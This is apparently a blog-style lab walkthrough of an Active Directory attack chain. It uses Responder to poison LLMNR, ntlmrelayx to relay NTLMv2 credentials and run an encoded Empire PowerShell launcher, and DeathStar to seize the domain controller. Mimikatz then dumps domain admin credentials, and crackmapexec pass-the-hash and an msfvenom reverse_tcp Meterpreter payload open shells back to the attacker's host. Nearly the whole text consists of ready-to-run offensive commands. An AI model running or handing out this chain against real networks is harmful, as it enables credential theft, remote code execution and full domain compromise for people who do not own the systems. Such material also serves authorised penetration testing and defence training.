What I’m using:
Host: Ubuntu 16.04, Kali Linux (Latest)
Target 1: Windows Server 2008 R2 (Dummy server)
Target 2: Windows Server 2008 R2 (Domain Controller)
In a domain, it’s not uncommon for NTLMv2 hashes to be captured in some way while doing a penetration test. The problem is that NTLMv2 hashes cannot be passed (but regular NTLM can) and if your dictionary isn’t good or they enforce a strict password with numbers and special characters, you’ll be sitting with an NTLMv2 Hash and username and nothing to do. However, there is the option of relaying that username & hash. The nasty thing about this is NTLM Relaying can lead to remote code execution if the captured credentials have access to shares on a Windows server. What gets even worse is there’s a few tools that can automate the entire damn thing.
Now before I get started there’s a few things I’d like to clarify.
- I have to use Ubuntu for Deathstar because Deathstar will not work with the current version of Kali due to the python requests not wanting to negotiate any version of TLS less than 1.2.
- This first part of this process is assuming that NTLM relaying is possible, which if SMB signing is enabled, this entire operation is dead in the water. By default, it’s disabled, so that’s good/bad depending on your perspective. Deathstar needs an Empire agent to work, so if you can get that agent on a machine by any ways possible, Deathstar will do its stuff. It doesn’t NEED NTLM relaying, this is just an interesting way of getting an Empire agent.
- I’m doing this on my lab network, not someone else’s. This demo is simulating what can happen if LLMNR spoofing is possible and a domain admin credentials are captured. This is a very limited demo of what Deathstar & Crackmapexec can do and I encourage you to read about it’s capabilities here.
Without further ado:
I first start up the RESTful API for Empire in one terminal.
sudo python empire --rest --username empireadmin --password Password123
Then I start up Deathstar in another.
sudo ./DeathStar.py --listener-ip 192.168.232.133 -t 100
Listener IP will be whatever IP Empire is listening on. –t 100 means I’m giving it 100 threads to run, so it’s faster.
Next, I generate the powershell script from Empire. To do this, go to the listener module in Empire by typing in
From here, I create the payload by using the command
launcher powershell Deathstar
Copy the powershell script as you’ll paste it in a minute.
Next, I set up ntlmrelayx.py (Guide to set up NTLMRelayx.py here)
sudo ntlmrelayx.py -t 192.168.232.100 -c 'powershell -noP -sta -w 1 -enc [powershell code]’
ntlmrelayx.py also supports files with the –tf switch, so you can put in multiple targets if you wanted. Keep note that the powershell script must be in quotes or else it won’t run.
Next, edit the Responder.conf file in the Responder repository and turn off SMB and HTTP
Finally, start up Responder
sudo python Responder.py -I ens33 -r -d –v
My screen then looks like this once it’s all set up.
Next, using my Windows machine, I simulate the domain admin mistyping a share, generating a LLMNR request.
Poisoned answer is then sent via Responder
NTLMv2 hashed credentials are relayed
Empire agent opened
Deathstar automatically starts doing its thing
Deathstar, for this demo, took about 5 minutes to find the domain controller, its active users, then spawn another Empire agent on the domain controller.
An Empire agent is now running on the DC
The final step is to get a shell.
There’s many ways to do this
- Upload a meterpreter payload in the form of a .exe and execute it via the shell command
- Use mimikatz to get the credentials on the server and use crackmapexec to pass the hash and open a meterpreter session
- Use Empire’s Invoke-Shellcode module
- Many more, research it.
Using Mimikatz & Crackmapexec to open Meterpreter Shell
First is to interact with the agent. Always use the agent with SYSTEM privileges. While user “god” is domain admin, SYSTEM is still a higher privilege.
interact [agent name]
Then run mimikatz
After a minute it’ll spit out a ton of info. Ignore it by pressing enter and then typing
and a nice table is shown.
As you can see, it found the hashes and plain text password of the domain administrator. From here, we can use crackmapexec to open a reverse shell.
First set up multi/handler
Then run crackmapexec. Even though I have the password in plain text, I’m demonstrating the hash here to show PTH is possible.
crackmapexec 192.168.232.100 -u god -H 7314885dc066c5fd98e6ae96832fa905 -M metinject -o LHOST=192.168.232.136 LPORT=4443
Uploading a Meterpreter Payload via Empire
First, create a Meterpreter payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.232.136 LPORT=4443 -f exe > shell.exe
Copy the .exe into the Empire directory
Interact with the agent in Empire
interact [Agent name]
Upload and execute the .exe
Grats on shell
There’s many many more ways to escalate from an agent to a shell, but these are two of the easiest, albeit uploading an executable is not the stealthiest and probably the least recommended, but a shell is a shell.
Extra Resources and credit for Deathstar & Crackmapexec: